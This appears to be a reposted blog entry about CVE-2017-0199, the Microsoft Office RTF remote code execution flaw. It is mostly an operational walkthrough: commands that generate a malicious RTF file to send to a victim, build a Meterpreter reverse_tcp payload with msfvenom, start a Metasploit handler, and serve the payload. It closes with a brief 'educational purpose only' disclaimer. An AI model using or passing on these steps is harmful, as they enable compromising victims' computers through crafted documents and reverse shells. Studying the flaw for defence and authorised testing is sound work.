Microsoft Office Word RTF RCE vulnerability,cve-2017-0199,cve-2017-0199 metasploit

What is CVE-2017-0199?

Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 allow remote attackers to execute arbitrary code via a crafted document, aka “Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API.”


Download cve-2017-0199_toolkit

Generate malicious RTF file using following command and send it to victim


# python -M gen -w -u


# python -M gen -w Invoice.rtf -u

(Optional, if using MSF Payload) : Generate metasploit payload and start handler


Generate Payload:

# msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > /tmp/shell.exe

Start Handler:

# msfconsole -x “use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST; run”

Start toolkit in exploitation mode to deliver payloads


# python -M exp -e -l


# python -M exp -e -l /tmp/shell.exe



This program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (bhdresh) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs.


The post CVE-2017-0199: Microsoft Office Word RTF RCE vulnerability appeared first on Penetration Testing in Linux.


Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do

Você está comentando utilizando sua conta Sair /  Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair /  Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair /  Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair /  Alterar )


Conectando a %s